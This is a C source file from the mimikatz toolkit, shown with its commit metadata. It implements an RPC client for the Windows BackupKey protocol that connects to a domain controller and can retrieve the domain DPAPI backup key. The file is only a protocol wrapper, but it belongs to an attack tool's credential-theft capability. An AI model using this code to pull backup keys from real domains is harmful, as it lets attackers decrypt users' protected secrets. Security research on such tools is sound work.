mimikatz/modules/rpc/kull_m_rpc_bkrp.c
Benjamin DELPY 1722002956 [change] ts:: now uses only winsta API (instead of mix of wts32api and winsta)
[new] rpc::connect support /null NTLM session for protseq ncacn_ip_tcp
2017-03-20 04:37:36 +02:00

65 lines
2.3 KiB
C

/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kull_m_rpc_bkrp.h"
BOOL kull_m_rpc_bkrp_createBinding(LPCWSTR NetworkAddr, RPC_BINDING_HANDLE *hBinding)
{
BOOL status = FALSE;
LPWSTR szTmpDc = NULL;
if(!NetworkAddr)
if(kull_m_net_getDC(NULL, DS_WRITABLE_REQUIRED, &szTmpDc))
NetworkAddr = szTmpDc;
if(NetworkAddr)
status = kull_m_rpc_createBinding(NULL, L"ncacn_np", NetworkAddr, L"\\pipe\\protected_storage", L"ProtectedStorage", TRUE, (MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE, NULL, RPC_C_IMP_LEVEL_IMPERSONATE, hBinding, NULL);
if(szTmpDc)
LocalFree(szTmpDc);
return status;
}
BOOL kull_m_rpc_bkrp_generic(LPCWSTR NetworkAddr, const GUID * pGuid, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut)
{
BOOL status = FALSE;
RPC_BINDING_HANDLE hBinding;
NET_API_STATUS netStatus;
PBYTE out = NULL;
*pDataOut = NULL;
*pdwDataOut = 0;
if(kull_m_rpc_bkrp_createBinding(NetworkAddr, &hBinding))
{
RpcTryExcept
{
netStatus = BackuprKey(hBinding, (GUID *) pGuid, (PBYTE) DataIn, dwDataIn, &out, pdwDataOut, 0);
if(status = (netStatus == 0))
{
if(*pDataOut = LocalAlloc(LPTR, *pdwDataOut))
RtlCopyMemory(*pDataOut, out, *pdwDataOut);
MIDL_user_free(out);
}
else PRINT_ERROR(L"BackuprKey: 0x%08x (%u)\n", netStatus, netStatus);
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
kull_m_rpc_deleteBinding(&hBinding);
}
return status;
}
BOOL kull_m_rpc_bkrp_Restore(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut)
{
return kull_m_rpc_bkrp_generic(NetworkAddr, &BACKUPKEY_RESTORE_GUID, DataIn, dwDataIn, pDataOut, pdwDataOut);
}
BOOL kull_m_rpc_bkrp_Backup(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut)
{
return kull_m_rpc_bkrp_generic(NetworkAddr, &BACKUPKEY_BACKUP_GUID, DataIn, dwDataIn, pDataOut, pdwDataOut);
}
BOOL kull_m_rpc_bkrp_BackupKey(LPCWSTR NetworkAddr, PVOID *pDataOut, DWORD *pdwDataOut)
{
BYTE dataIn = 'k';
return kull_m_rpc_bkrp_generic(NetworkAddr, &BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID, &dataIn, 0, pDataOut, pdwDataOut);
}